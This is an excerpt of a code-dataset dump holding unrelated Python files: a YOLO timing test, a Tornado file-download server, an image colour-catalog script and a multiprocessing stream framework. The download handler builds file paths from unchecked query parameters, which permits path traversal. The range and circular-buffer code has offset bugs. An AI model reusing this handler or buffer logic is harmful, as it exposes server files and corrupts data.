nms_thresh=0.4, gpus=gpus)\n\n if IterationTimes==1:\n bboxes = net.return_predict(img)\n output = plot_cv2_image(bboxes, img)\n output_img = output[-1]\n cv2.imwrite('output_image.png', output_img)\n else:\n meant=0\n bboxes = net.return_predict(img)\n times = IterationTimes\n for i in range(times):\n print(i)\n t1=time.time()\n bboxes = net.return_predict(img)\n meant += time.time()-t1\n meant /= times\n print(\"{:.4f} fps\".format(1/meant))\n\n except AssertionError:\n print('To test, the variable -img- can be used over a real input image or a random noise')\n print('The input arguments in test function are the following: ')\n print('cfgfile weightfile GPUs BatchSize IterationTimes')\n print('')\n print('cfgfile:\\tYolo configuration file')\n print('weightfile:\\tYolo weights file')\n print('GPUs:\\t\\tnumber of GPUs employed to run Yolo')\n print('BatchSize:\\tNumber of camera images stacked in one batch')\n print('IterationTimes:\\tK Iterations for time processing testing (optional)')\n print('')\n print('')\n print('Usage:')\n print(' import module.main_module as module')\n print('')\n print(' module.test(cfg/yolo_person.cfg, backup/yolo_person.weights, 2, 8, 10) ')\n print(' perform detection on multiple cameras using pipeline workflow and compute the mean time in 10 iterations')\n print('or')\n print(' module.test(cfg/yolo_person.cfg, backup/yolo_person.weights, 2, 1, 1) ')\n print(' perform detection on one camera using pipeline workflow')","sub_path":"module_cpu/main_module.py","file_name":"main_module.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"72305380","text":"import asyncpg\nfrom config import ServerParameters\nimport tornado.ioloop\nimport tornado.web\nimport tornado.websocket\nfrom tornado import gen\nimport json\nimport datetime\nimport asyncio\nimport tigerfunctools\nfrom dateutil import parser\nfrom tornado.escape import utf8, _unicode\nfrom tornado.platform.asyncio import AsyncIOMainLoop\nfrom tornado import gen\nimport asyncio\nimport uuid\nimport os\nfrom PIL import Image\nimport io\nfrom urllib import parse as urlparse\n\nclass download_Handler(tornado.web.RequestHandler):\n async def post(self):\n self.flush()\n pass\n\n async def get(self):\n inputdict = dict((k, v[-1]) for k, v in self.request.arguments.items())\n\n filename = None\n filedb = \"\"\n smaxwidth = None\n smaxheight = None\n id = None\n\n if (\"filedb\" in inputdict.keys()):\n filedb = inputdict[\"filedb\"].decode(\"utf-8\")\n if (\"id\" in inputdict.keys()):\n id = inputdict[\"id\"].decode(\"utf-8\")\n if (id.isnumeric() == True):\n async with ServerParameters.pg_pool.acquire() as conn: # 查询数据库得到文件名\n row = await conn.fetchrow(\"select * from files where files_id=$1;\", int(id))\n if row != None:\n filename = row[\"files_savefilename\"]\n filedb = row[\"files_fileid\"]\n else:\n filename = id\n else:\n if (\"filename\" in inputdict.keys()):\n filename = inputdict[\"filename\"].decode(\"utf-8\")\n\n if filename == None:\n self.set_status(404)\n return\n if len(filedb) > 0:\n filedb = filedb + \"/\" # 加上路径符号\n\n if (\"maxwidth\" in inputdict.keys()):\n smaxwidth = inputdict[\"maxwidth\"].decode(\"utf-8\")\n if (\"maxheight\" in inputdict.keys()):\n smaxheight = inputdict[\"maxheight\"].decode(\"utf-8\")\n\n maxwidth = 0\n maxheight = 0\n if (smaxwidth != None):\n maxwidth = int(smaxwidth)\n if (smaxheight != None):\n maxheight = int(smaxheight)\n\n maxstr = \"\"\n if (maxwidth != 0 or maxheight != 0):\n maxstr = str(maxwidth) + \"_\" + str(maxheight)\n\n f = open(ServerParameters.filespath + filedb + filename, \"rb\")\n m_time = datetime.datetime.fromtimestamp(os.path.getmtime(ServerParameters.filespath + filedb + filename))\n\n r_time = utf8(self.request.headers.get(\"If-Modified-Since\", \"\"))\n if (len(r_time) > 8):\n r_time = parser.parse(r_time)\n if (r_time == m_time):\n self.set_status(304) # 文件相同\n return\n\n isimage = False\n f.seek(0, 2)\n filelength = f.tell()\n isresize = False\n newds = None\n\n if (filename.find(\".jpg\") >= 0 or filename.find(\".bmp\") >= 0 or filename.find(\".gif\") >= 0 or filename.find(\n \".png\") >= 0):\n isimage = True\n if (maxheight == 0 and maxwidth == 0):\n newds = None\n else:\n newds = AsycnGetCustomSmallPic(f, maxwidth, maxheight)\n if (newds != None):\n newds.seek(0, 2)\n filelength = newds.tell()\n isresize = True\n newds.seek(0, 0)\n\n '''\n etag = str(fi.upload_date) + str(filelength)\n self.set_header(\"Etag\", etag)\n\n if (self.check_etag_header()==True):\n ds.close()\n newds.close()\n self.set_status(304)\n return\n '''\n\n p = 0\n range = self.request.headers.get(\"Range\", \"\")\n if (len(range) > 0):\n self.set_status(205) # 断点续传\n p = int(range.replace(\"bytes=\", \"\").replace(\"-\", \"\"))\n if (p >= filelength):\n return\n self.set_header(\"Content-Range\", \"bytes \" + str(p) + \"-\" + str(filelength - 1) + \"/\" + str(filelength))\n self.set_header(\"Content-Length\", str(filelength - p))\n if (isimage == True):\n self.set_header(\"Content-Type\", \"image/\" + \"jpg\")\n else:\n self.set_header(\"Content-Type\", \"application/octet-stream\")\n if (isresize):\n self.set_header(\"Content-Disposition\", \"attachment;\" + urlparse.urlencode({\"filename\": maxstr + filename}))\n else:\n self.set_header(\"Content-Disposition\", \"attachment;\" + urlparse.urlencode({\"filename\": filename}))\n self.add_header(\"Date\", datetime.datetime.now()) # .strftime(\"%a, %d %h %Y %H:%M:%S GMT\")\n self.add_header(\"Last-Modified\", m_time)\n self.add_header(\"Expires\", datetime.datetime.now() + datetime.timedelta(days=365))\n self.set_header(\"Cache-Control: public\", True)\n\n if (isresize):\n newds.seek(p)\n bbb = newds.read()\n self.write(bbb[p:])\n else:\n f.seek(p)\n bbb = f.read()\n self.write(bbb)\n\n if (newds != None):\n newds.close()\n if (f != None):\n f.close()\n self.flush()\n\n\ndef AsycnGetCustomSmallPic(inputstream, cwidth, cheight, bscale=True):\n if (inputstream == None):\n return None\n size = [150, 0]\n inputstream.seek(0)\n bbb = inputstream.read()\n img = Image.open(io.BytesIO(bbb))\n\n if (img == None):\n return None\n\n if (img.width <= cwidth and img.height <= cheight):\n return None\n if (cwidth == 0 and cheight == 0):\n cwidth = img.width\n cheight = img.height\n else:\n if (cwidth == 0):\n cwidth = (cheight * img.width) / img.height\n if (cheight == 0):\n cheight = (cwidth * img.height) / img.width\n\n srcRect = [0, 0, img.width, img.height]\n\n if (bscale == True):\n if (img.width * 75 >= img.height * 100): # 宽度大, 变y\n x = cwidth\n y = (img.height * cwidth) / img.width\n else:\n x = (img.width * cheight) / img.height\n y = cheight\n else:\n x = cwidth\n y = cheight\n\n img = img.resize((int(x), int(y)))\n if (img.mode != \"RGB\"):\n img = img.convert(\"RGB\")\n\n outstream = io.BytesIO()\n img.save(outstream, \"JPEG\")\n outstream.flush()\n return outstream\n\n\nif __name__ == '__main__':\n asyncioloop = asyncio.get_event_loop()\n AsyncIOMainLoop().install()\n tornadoinstance = tornado.ioloop.IOLoop.instance()\n\n app = tornado.web.Application([\n (r'/test', download_Handler),\n ])\n app.listen(3000)\n\n asyncioloop.run_forever()\n","sub_path":"tiger_python_tools/pg_filedownload.py","file_name":"pg_filedownload.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"528631694","text":"#ele vai pegar uma pasta, e criar um json nela, listando a media de cores de cada imagem na pasta\r\n#e juntar todas essas informacoes em um catalogo. funcoes que ele contem\r\n#uma que vai pegar uma pasta inteira para listar todas as imagem, checar se ja tem um catalogo\r\n#outra para remover item da lista, junto com seu arquivo\r\n#e adicionar item na mao mesmo se quiser\r\n'''\r\nestrutura catalogo\r\n\r\ndict gigante??\r\n{\r\n \"padrao_imagens\" : [120, 120, \"RGB\"]\r\n \"arquivo1.png\" : (123, 221, 24),\r\n \"arquivo2.png\" : (151, 172, 38)\r\n}\r\n\r\n'''\r\n\r\nimport sys, os\r\nfrom PIL import Image\r\nfrom getopt import getopt, GetoptError \r\nimport json\r\nimport numpy as np\r\nimport re\r\n\r\ncaminho = \"assets/texturaMinecraft\"\r\n#'all' para pasta toda, 'rem' para remover arquivos e 'add' para adicionar arquivos\r\nmodo = 'all'\r\n\r\ndef carregar_catalogo():\r\n try:\r\n with open(\"_catalogo.json\", \"r\") as obj:\r\n catalogo = json.load(obj)\r\n except:\r\n return definir_catalogo()\r\n\r\ndef salvar_catalogo(catalogo):\r\n with open(\"_catalogo.json\", \"w\") as obj:\r\n json.dump(catalogo, obj)\r\n\r\ndef cores_medias_imagemRGB(PIL_imagem):\r\n pixels = np.array(PIL_imagem)\r\n soma_pixels_RGB = pixels.sum(1)\r\n\r\n soma_pixels_canal_R = soma_pixels_RGB[:, 0].sum()\r\n soma_pixels_canal_G = soma_pixels_RGB[:, 1].sum()\r\n soma_pixels_canal_B = soma_pixels_RGB[:, 2].sum()\r\n\r\n imagem_quant_pixels = PIL_imagem.height * PIL_imagem.width\r\n\r\n media_canal_R = soma_pixels_canal_R // imagem_quant_pixels\r\n media_canal_G = soma_pixels_canal_G // imagem_quant_pixels\r\n media_canal_B = soma_pixels_canal_B // imagem_quant_pixels\r\n\r\n return [int(media_canal_R), int(media_canal_G), int(media_canal_B)]\r\n\r\ndef definir_catalogo():\r\n print(\"ora bolar, percebo que nao tienes uno cataloguito\")\r\n print(\"pero joy possy ajhudalo, so me ajuder a te ajudar\")\r\n\r\n while True:\r\n tamanho_raw = input(\"qual o tamanho das imagens[ex: 100l 100a]: \").strip()\r\n if not input(\"tem certeza?: Y/N\") in [\"N\", \"n\", \"pero que no\"]:\r\n try:\r\n largura, altura = tamanho_raw.split(\" \")\r\n largura, altura = int(largura), int(altura)\r\n except:\r\n print(\"escreveru merda ai >:(\")\r\n continue\r\n break\r\n\r\n while True:\r\n cores = input('e qual o padrao de cores [ex: RGB ou PB]: ').strip()\r\n if input(\"tem certeza?: Y/N\") not in [\"N\", \"n\", \"pero que no\"]:\r\n if cores not in [\"RGB\", 'PB', 'rgb', 'pb', 'r', 'p']:\r\n print(\"entrou uma cor errada ai otario\")\r\n continue\r\n break\r\n\r\n catalogo = {'padrao_imagens' : [largura, altura, cores]}\r\n return catalogo\r\n\r\ndef add_img_catalogo(catalogo, nome_imagem, cores_imagem):\r\n catalogo.update({nome_imagem : cores_imagem})\r\n\r\n#pega os parametros pela linha de comando\r\nif(len(sys.argv) > 1):\r\n try:\r\n opts, args = getopt(sys.argv[1:],\"p:o:\")\r\n except GetoptError:\r\n print(\"algum argumento invalido\")\r\n sys.exit(2)\r\n\r\n for opt, arg in opts:\r\n if opt == '-p':\r\n caminho = arg\r\n elif opt == '-o':\r\n modo = arg\r\n\r\nif modo == 'all':\r\n #adiciona todas as imagens na pasta para um catalogo\r\n #o catalogo pode ou não já existir\r\n try:\r\n os.chdir(caminho)\r\n except FileNotFoundError:\r\n raise Exception(f'O caminho \"{caminho}\" nao e valido')\r\n\r\n imagens = [f for f in os.listdir() if f[-4:] == \".png\"]\r\n\r\n catalogo = carregar_catalogo()\r\n\r\n for nome_imagem in imagens:\r\n if nome_imagem not in catalogo:\r\n imagem = Image.open(nome_imagem)\r\n medias_imagem = cores_medias_imagemRGB(imagem)\r\n add_img_catalogo(catalogo, nome_imagem, medias_imagem)\r\n\r\n salvar_catalogo(catalogo)\r\n\r\n\r\nelif modo == 'rem':\r\n #remove uma imagem do catalogo dependendo procurando pelo nome dela\r\n pass\r\nelif modo == 'add':\r\n #adiciona uma ou mais imagens no catalogo\r\n pass\r\nelse:\r\n print(\"modo invalido\")\r\n \r\n\r\n","sub_path":"python/listador.py","file_name":"listador.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"114764976","text":"\"\"\"\nThis module makes processes for a multicore application.\nIt uses multiprocessing.Array to enable multiple processes to\nshare access to streams efficiently.\n\"\"\"\nimport sys\nimport os\n# Check whether the Python version is 2.x or 3.x\n# If it is 2.x import Queue. If 3.x then import queue.\nis_py2 = sys.version[0] == '2'\nif is_py2:\n import Queue as queue\nelse:\n import queue as queue\n\nimport multiprocessing\n# multiprocessing.Array provides shared memory that can\n# be shared across processes.\nimport threading\nimport time\nsys.path.append(os.path.abspath(\"../agent_types\"))\nsys.path.append(os.path.abspath(\"../core\"))\nsys.path.append(os.path.abspath(\"../helper_functions\"))\n\n# sink, op are in the agent_types folder\nfrom sink import stream_to_queue, sink_list, sink_element\nfrom op import map_element, map_list\n# compute_engine, stream are in the core folder\nfrom compute_engine import ComputeEngine\nfrom stream import Stream\n# basics is in the helper_functions folder\nfrom basics import map_e, fmap_e, map_l, f_mul\nfrom print_stream import print_stream\n# utils is in the current folder\nfrom utils import check_processes_connections_format, check_connections_validity\n\n# BUFFER_SIZE is the default length of each buffer.\nBUFFER_SIZE = 2**20\n# MAX_NUM_SOURCES is the maximum number of sources in a multicore application.\nMAX_NUM_SOURCES = 10\nMAX_NUM_PROCESSES = 8\n\n#-----------------------------------------------------------------------\nclass Proc(object):\n \"\"\"\n Proc creates a process in a multicore application.\n\n Parameters\n ----------\n spec: dict\n spec is a specification of a process.\n The keywords of spec are the following strings.\n 'in_stream_names_types'\n 'out_stream_names_types'\n 'compute_func'\n 'keyword_args'\n 'sources'\n 'actuators'\n The keyword 'compute_func' is required. The other keywords\n of spec can be omitted in which case a default value is used.\n connections: dict\n connections specifies the connection of an output stream of a\n process to the input stream of the same or another process.\n name: str\n Every process must have a unique name.\n\n Attributes\n ----------\n in_stream_names_types : list\n in_stream_names_types is a list of pairs where each pair is\n (in_stream name, in_stream_type). An in_stream_type is a\n str defined in multiprocessing.Array. For example 'i' stands\n for int.\n The order of the pairs must correspond to the order of\n in_streams in compute_func.\n Example of in_stream_names_types = [('in', 'i')]\n which says that the compute function (compute_func) has a\n single input stream called 'in' which is of type int.\n Default: empty list\n out_stream_names_types : list\n Similar to in_stream_names_types.\n Example of out_stream_names_types = [('out', 'i')]\n which says that the compute function (compute_func) has a\n single input stream called 'out' which is of type int.\n Default: empty list\n compute_func: function\n The main thread of this process executes compute_func which\n creates a network of agents and runs the agents.\n compute_func is the function that carries out computation for\n this agent. compute_func(in_streams, out_streams) creates a\n network of agents.\n in_streams must correspond to in_stream_names_types.\n out_streams must correspond to out_stream_names_types.\n The thread that executes compute_func is started by starting\n stream.scheduler (see core/ComputeEngine.py).\n keyword_args: dict\n The keys of this dict are the keyword arguments of the\n function, compute_func. The value corresponding to a key\n is the CONSTANT value for the corresponding keyword argument.\n Example: {'ADDEND' :10} where ADDEND is a keyword argument of\n compute_func, and this keyword argument has value 10.\n Default: empty dict.\n sources: dict\n The keys of sources are names of sources. The value corresponding\n to a key is a description of the source. This description is\n also a dict with two keys: The type of data produced by the source\n and the function that generates the data. This function runs in\n its own thread.\n Example of sources:\n {'acceleration':\n {'type': 'i',\n 'func': source_thread_target\n }\n This process has a single source called 'acceleration' which uses\n the function source_thread_target to generate int data.\n Default: empty dict\n out_to_in: dict\n The keys are out_stream names of this process, and the\n values are lists.\n out_to_in[out_stream_name] is a list of pairs:\n (receiver_process_name, in_stream_name)\n where the out_stream called out_stream_name of this process\n is connected to the in_stream called in_stream_name in the\n receiver process called receiver_process_name.\n Example of self.out_to_in:\n {'out': [('aggregate_and_output_process', 'in')],\n 'acceleration': [('get_source_data_and_compute_process', 'in')]\n }\n The output stream called 'out' of this process is connected to\n an input stream called 'in' of the process called\n 'aggregate_and_output_process'.\n The output stream called 'acceleration' of this process is connected to\n an input stream called 'in' of the process called\n 'get_source_data_and_compute_process'.\n in_to_out: dict\n The keys are in_stream_names of this process and the values are\n pairs (out_process_name, out_stream_name).\n Example of self. in_to_out:\n {\n 'in': ('get_source_data_and_compute_process', 'acceleration')\n }\n This process has an input stream called 'in' connected to an\n output stream called 'acceleration' in the process called\n 'get_source_data_and_compute_process'\n The output stream may be an output of compute_func or an\n a source.\n \n\n Notes\n -----\n Examples of spec and connections are at the end of this file.\n See TEST.\n\n \"\"\"\n def __init__(self, spec, connections, name):\n self.spec = spec\n # Connections is a dict that specifies connections from outputs of\n # processes or sources to inputs of other processes.\n self.connections = connections\n self.name = name\n # in_stream_names_types is a list of in_stream names and their types.\n if 'in_stream_names_types' in self.spec:\n self.in_stream_names_types = self.spec['in_stream_names_types']\n else:\n self.in_stream_names_types = []\n # out_stream_names_types is a list of out_stream names and their types.\n if 'out_stream_names_types' in self.spec:\n self.out_stream_names_types = self.spec['out_stream_names_types']\n else:\n self.out_stream_names_types = []\n self.compute_func = self.spec['compute_func']\n if 'keyword_args' in self.spec:\n self.keyword_args = self.spec['keyword_args']\n else:\n self.keyword_args = {}\n if 'sources' in self.spec:\n self.sources = self.spec['sources']\n else:\n self.sources = {}\n self.source_keyword_args = {}\n if 'actuators' in self.spec:\n self.actuators = self.spec['actuators']\n else:\n self.actuators = {}\n self.out_to_in = self.connections[self.name]\n # out_to_buffer[out_stream_name] is (buffer, buffer_ptr) which is\n # the buffer to which this out_stream_name or source_name is connected.\n # Next, compute out_to_buffer.\n self.out_to_buffer = {}\n # create a buffer for each out_stream and each source of this process.\n # 1. Create a buffer for each out_stream of this process.\n # self.out_to_buffer[out_stream_name] becomes the buffer for the stream called\n # out_stream_name.\n # self.out_stream_names_types is a list of pairs:\n # ( out_stream_name, out_stream_type)\n for out_stream_name, out_stream_type in self.out_stream_names_types:\n if out_stream_type != 'x':\n buffer = multiprocessing.Array(out_stream_type, BUFFER_SIZE)\n # buffer_ptr is an integer with initial value of 0.\n buffer_ptr = multiprocessing.Value('i', 0)\n \n else:\n # TO DO: use the scheduler queues to send data from this output stream\n # to the inpute streams to which it is connected.\n pass\n self.out_to_buffer[out_stream_name] = (buffer, buffer_ptr)\n \n # 2. Create a buffer for each source of this process.\n # self.out_to_buffer[source_name] is the buffer for the source called\n # source_name\n for source_name, source_type_and_func in self.sources.items():\n source_type = source_type_and_func['type']\n if source_type != 'x':\n # This source generates data of a type accepted by\n # multiprocessing.Array\n buffer = multiprocessing.Array(source_type, BUFFER_SIZE)\n # buffer_ptr is a shared integer with initial value of 0.\n buffer_ptr = multiprocessing.Value('i', 0)\n else:\n # This source feeds a stream inside the same process in\n # which the source thread runs. This source does not feed\n # any other process. So, it does not need to use\n # multiprocessing.Array.\n # This source can generate arbitrary Python objects such as\n # tuples.\n buffer_ptr = 0\n buffer = [0] * BUFFER_SIZE\n self.out_to_buffer[source_name] = (buffer, buffer_ptr)\n\n # out_to_q_and_in_stream_signal_names[out_stream_name] is \n # a list of pairs (q, in_stream_signal_name).\n # where q is the queue of the receiving process and\n # in_stream_signal_name is 's_signal_' if the in_stream is 's'.\n # make_out_to_q_and_in_stream_signal_names() is the function\n # that fills in out_to_q_and_in_stream_signal_names.\n self.out_to_q_and_in_stream_signal_names = {}\n # in_queue is the input queue of this process.\n self.in_queue = multiprocessing.Queue()\n # process is created from the process specification and\n # connections. It is obtained by the function make_process().\n self.process = None\n # in_to_out[in_stream_name] is a pair:\n # (sender_process_name, out_stream_name)\n # in_to_out is filled in by the function\n # make_in_to_out()\n self.in_to_out = {}\n # in_to_buffer[in_stream_name] is a buffer. Data in this buffer\n # is copied into this in_stream.\n # in_to_buffer is computed by the function make_in_to_out().\n self.in_to_buffer = {}\n # Set by calling multicore\n self.process_ids = {}\n self.source_ids = {}\n self.source_status = {}\n self.queue_status = {}\n self.all_process_specs = {}\n self.all_procs = {}\n # main_lock is the lock acquired to do operations on\n # in_queue of processes. These operations check whether the\n # queues are empty. Empty queues are used to detect termination.\n self.main_lock = None\n return\n\n def make_in_to_out(self, procs, connections):\n \"\"\"\n Computes self.in_to_out and self.in_to_buffer\n\n Parameters\n ----------\n procs: dict\n procs[proc_name] is an instance of the Proc class\n\n \"\"\"\n for out_process_name, process_connections in connections.items():\n for out_stream_name, stream_connections in process_connections.items():\n for in_process_name, in_stream_name in stream_connections:\n if in_process_name == self.name:\n # The out_stream called out_stream_name in the\n # process called out_process_name is connected\n # to the in_stream called in_stream_name in THIS\n # process.\n self.in_to_out[in_stream_name] = (\n out_process_name, out_stream_name)\n # Get the sending process\n out_process = procs[out_process_name]\n # Get the output buffer in which data from the sending\n # stream is placed.\n out_buffer = out_process.out_to_buffer[out_stream_name]\n self.in_to_buffer[in_stream_name] = out_buffer\n return\n\n def make_out_to_q_and_in_stream_signal_names(self, procs):\n # Create q_and_in_stream_signal_names for each out_stream and\n # each source of this process.\n # 1. Create q_and_in_stream_signal_names for each out_stream of this process.\n for out_stream_name, out_stream_type in self.out_stream_names_types:\n # self.out_to_q_and_in_stream_signal_names[out_stream_name] is\n # q_and_in_stream_signal_names which is a list of pairs:\n # (q, in_stream_signal_name).\n # where q is the queue of the receiving process and\n # in_stream_signal_name is 's_signal_' if the in_stream is\n # 's'. These are the queues and in_stream_signals of the\n # input streams connected to this out_stream.\n self.out_to_q_and_in_stream_signal_names[out_stream_name] = []\n # receivers is a list of pairs (process name, in_stream name)\n receivers = self.out_to_in[out_stream_name]\n for receiver_proc_name, in_stream_name in receivers:\n receiver_proc = procs[receiver_proc_name]\n self.out_to_q_and_in_stream_signal_names[out_stream_name].append(\n (receiver_proc.in_queue, in_stream_name + '_signal_'))\n\n # 2. Create q_and_in_stream_signal_names for each source of this process.\n # self.out_to_q_and_in_stream_signal_names[name] is the\n # q_and_in_stream_signal_names for the connections to the source called\n # name\n for source_name, source_type_and_func in self.sources.items():\n self.out_to_q_and_in_stream_signal_names[source_name] = []\n # receivers is a list of pairs (process name, in_stream name)\n receivers = self.out_to_in[source_name]\n for receiver_proc_name, in_stream_name in receivers:\n # receiver_proc is the Proc with the name, receiver_proc_name.\n receiver_proc = procs[receiver_proc_name]\n # (1) Associate the in_queue of the receiver process with the\n # source called source_name.\n # (2) The messages about new data in the source called source_name\n # are sent to the stream called in_stream_name + '_signal_'\n # in the receiver process.\n self.out_to_q_and_in_stream_signal_names[source_name].append(\n (receiver_proc.in_queue, in_stream_name + '_signal_'))\n return\n\n # Make the process. First define the target() function of the process.\n def make_process(self):\n def target():\n \"\"\"\n This is the target function of this process. This function has the\n following steps:\n 1. Create in_streams of the this process, i.e., the in_streams of\n the compute_func of the process.\n 2. Create in_stream_signals, with an in_stream_signal corresponding\n to each in_stream.\n 3. Create out_streams of this process, i.e. out_streams of the\n compute_func of this process.\n 4. Create the computational agent (compute_func) of this process.\n 5. For each out_stream of compute_func, create an agent to copy the\n out_stream to its buffer, and then copy the buffer to each\n in_stream to which it is connected.\n 6. For each in_stream of compute_func, create an agent to copy its\n input buffer into the in_stream.\n 7. Create the scheduler for this process. Starting the scheduler\n starts the thread that executes compute_func for this agent.\n 8. Create the source threads for each source in this process. The\n source_thread gets data from a source, puts the data into a\n buffer, and then copies the buffer to each in_queue to which the\n source is connected.\n 9. Start the scheduler and source threads.\n 10. Join the scheduler and source threads.\n \n \"\"\"\n # STEP 1\n # CREATE THE IN_STREAMS OF COMPUTE_FUNC \n # and compute the dict, name_to_stream.\n # in_streams is the list of in_stream of this process.\n self.in_streams = []\n # name_to_stream is a dict where the key is the name of an\n # input or output stream and the value is the stream itself.\n self.name_to_stream = {}\n for in_stream_name, in_stream_type in self.in_stream_names_types:\n in_stream = Stream(name=in_stream_name)\n self.in_streams.append(in_stream)\n self.name_to_stream[in_stream_name] = in_stream\n\n # STEP 2\n # CREATE IN_STREAM_SIGNALS which is a list of input streams, with\n # one in_stream_signal for each in_stream.\n # in_stream_signal[j] is the stream that tells\n # this process that it has data to be read into\n # in_stream[j]. The name of an in_stream_signal associated with an\n # in_stream called 's' is 's_signal_'.\n self.in_stream_signals = []\n for in_stream in self.in_streams:\n in_stream_signal_name = in_stream.name + '_signal_'\n in_stream_signal = Stream(name=in_stream_signal_name)\n self.in_stream_signals.append(in_stream_signal)\n self.name_to_stream[in_stream_signal_name] = in_stream_signal\n\n # STEP 3\n # CREATE THE OUT_STREAMS FOR COMPUTE_FUNC.\n # out_streams is a list of the output streams of this process.\n self.out_streams = []\n for out_stream_name, out_stream_type in self.out_stream_names_types:\n out_stream = Stream(out_stream_name)\n self.out_streams.append(out_stream)\n self.name_to_stream[out_stream_name] = out_stream\n\n # STEP 4\n # CREATE THE COMPUTE AGENT FOR THIS PROCESS.\n self.compute_func(self.in_streams, self.out_streams, **self.keyword_args)\n\n # STEP 5\n # CREATE AGENTS TO COPY EACH OUT_STREAM OF COMPUTE_FUNC TO IN_STREAMS.\n # Note: Create an agent for each out_stream of compute_func and\n # create an agent for each source. This agent copies the elements\n # in each out_stream into the in_streams to which it is connected.\n # See copy_stream().\n #\n # self.out_stream_names_types is a list of pairs:\n # (out_stream_name, out_stream_type)\n for out_stream_name, out_stream_type in self.out_stream_names_types:\n # STEP 5.1: Get parameters of each agent.\n # Step 5.1.1 Get the out_stream with the specified name.\n out_stream = self.name_to_stream[out_stream_name]\n # Step 5.1.2 Get the buffer and buffer_ptr into which this out_stream\n # is copied.\n buffer, buffer_ptr = self.out_to_buffer[out_stream_name]\n # Step 5.1.3 Get the list of pairs (q, in_stream_signal_name) connected\n # to this out_stream\n q_and_in_stream_signal_names = \\\n self.out_to_q_and_in_stream_signal_names[out_stream_name]\n # STEP 5.2: Make agent that copies out_stream to the in_streams to\n # which it is connected. The input stream to this agent is out_stream.\n # stream_name is a keyword argument of copy_stream().\n sink_list(func=self.copy_stream, in_stream=out_stream,\n stream_name=out_stream_name)\n\n # STEP 6\n # CREATE AGENTS TO COPY BUFFERS TO IN_STREAMS.\n # For each in_stream of this process, create an agent that\n # copies data from the input buffer of this in_stream into\n # the in_stream.\n # This agent subscribes to the in_stream_signal associated\n # with this in_stream. When in_stream_signal gets a message\n # (start, end) this agent copies the buffer segment between\n # start and end into the in_stream.\n # copy_buffer_segment() is the function executed by the agent\n # when a new message arrives. This function extends out_stream\n # with the segment of the buffer specified by the message.\n for in_stream_name, in_stream_type in self.in_stream_names_types:\n in_stream_signal_name = in_stream_name + '_signal_'\n # Get the in_stream_signal stream from its name.\n in_stream_signal = self.name_to_stream[in_stream_signal_name]\n # Get the in_stream from its name\n in_stream = self.name_to_stream[in_stream_name]\n # Get the buffer that feeds this in_stream.\n buffer, buffer_ptr = self.in_to_buffer[in_stream_name]\n # Create agents\n sink_element(\n func=copy_buffer_segment,\n in_stream=in_stream_signal,\n out_stream=in_stream,\n buffer=buffer, in_stream_type=in_stream_type)\n\n # STEP 7\n # CREATE A NEW STREAM.SCHEDULER FOR THIS PROCESS\n # Specify the scheduler, input_queue and name_to_stream for\n # this processes.\n Stream.scheduler = ComputeEngine(self)\n # input_queue is the queue into which all streams for this\n # process are routed.\n Stream.scheduler.input_queue = self.in_queue\n # The scheduler for a process uses a dict, name_to_stream.\n # name_to_stream[stream_name] is the stream with the name stream_name.\n Stream.scheduler.name_to_stream = self.name_to_stream\n\n # STEP 8\n # CREATE SOURCE_THREADS\n source_threads = []\n for source_name, description in self.sources.items():\n # thread_creation_func returns a thread which\n # gets data from a source with name source_name and then\n # uses self.copy_stream to copy the data into a\n # buffer associated with this source, and\n # informs all in_streams connected to this source that\n # new data has arrived.\n thread_target = description['func']\n if 'keyword_args' in description.keys():\n self.source_keyword_args = description['keyword_args']\n else:\n self.source_keyword_args = {}\n # Get the source_thread for the source with this name.\n #source_thread = thread_creation_func(self.copy_stream, source_name)\n source_thread = self.create_source_thread(thread_target, source_name,\n **self.source_keyword_args)\n source_threads.append(source_thread)\n\n # STEP 9\n # START SOURCE THREADS AND START SCHEDULER.\n # Starting the scheduler starts a thread --- the main thread --- of this\n # process. The scheduler thread gets a ready agent from the in_queue of\n # this process and then executes the next step of the agent.\n Stream.scheduler.start()\n for source_thread in source_threads:\n source_thread.start()\n\n # STEP 10\n # JOIN SOURCE THREADS AND JOIN SCHEDULER.\n for source_thread in source_threads:\n source_thread.join()\n\n Stream.scheduler.join()\n return\n\n # Create the process.\n self.process = multiprocessing.Process(target=target)\n\n def create_source_thread(self, thread_target, stream_name, **source_keyword_args):\n this_source = (self, stream_name)\n return threading.Thread(target=thread_target,\n args=(this_source,))\n \n def copy_stream(self, lst, stream_name):\n \"\"\"\n Parameters\n ----------\n lst: list\n the sequence of values that are copied to streams connected to this\n stream\n stream_name: str\n The name of the stream that is copied to other streams.\n Notes\n -----\n This is the function called by sink agents to take the following steps:\n STEP 1: Get objects connected to the stream with this name.\n STEP 2: Copy lst into the circular buffer which is the output buffer for\n this stream.\n STEP 3: Put a message into the queue of each process that receives lst.\n This message is put into an in_stream_signal of the receiving\n process.\n STEP 4: Update parameters to get ready for next call to this function.\n\n \"\"\"\n # STEP 1: GET BUFFER, QUEUE, STREAMS CONNECTED TO THIS STREAM\n buffer, buffer_ptr = self.out_to_buffer[stream_name]\n q_and_in_stream_signal_names = \\\n self.out_to_q_and_in_stream_signal_names[stream_name]\n\n # STEP 2: COPY LST INTO THE CIRCULAR BUFFER\n n = len(lst)\n assert n < BUFFER_SIZE, \\\n \"The length of input data is greater than the buffer size\"\n if isinstance(buffer_ptr, int):\n # This buffer is for a local stream.\n # This buffer is a Python list and not multiprocessing.Array\n buffer_end_ptr = buffer_ptr + n\n buffer_current_ptr = buffer_ptr\n else:\n # This buffer uses multiprocessing.Array\n buffer_end_ptr = buffer_ptr.value + n\n buffer_current_ptr = buffer_ptr.value\n if buffer_end_ptr < BUFFER_SIZE:\n # In this case, don't need to wrap around the\n # end of the buffer.\n buffer[buffer_current_ptr : buffer_end_ptr] = lst\n else:\n # In this case, must wrap around the end of\n # the circular buffer.\n # remaining_space is the space remaining from\n # buffer_ptr to the end of the buffer.\n remaining_space = BUFFER_SIZE - buffer_end_ptr\n # Copy remaining_space elements of the list\n # to fill up the buffer.\n buffer[buffer_current_ptr:] = lst[:remaining_space]\n # That leaves n-remaining_space elements of the\n # list that are yet to be copied into the buffer.\n # Copy the remaining elements of list into the\n # buffer starting from slot 0.\n buffer[:n-remaining_space] 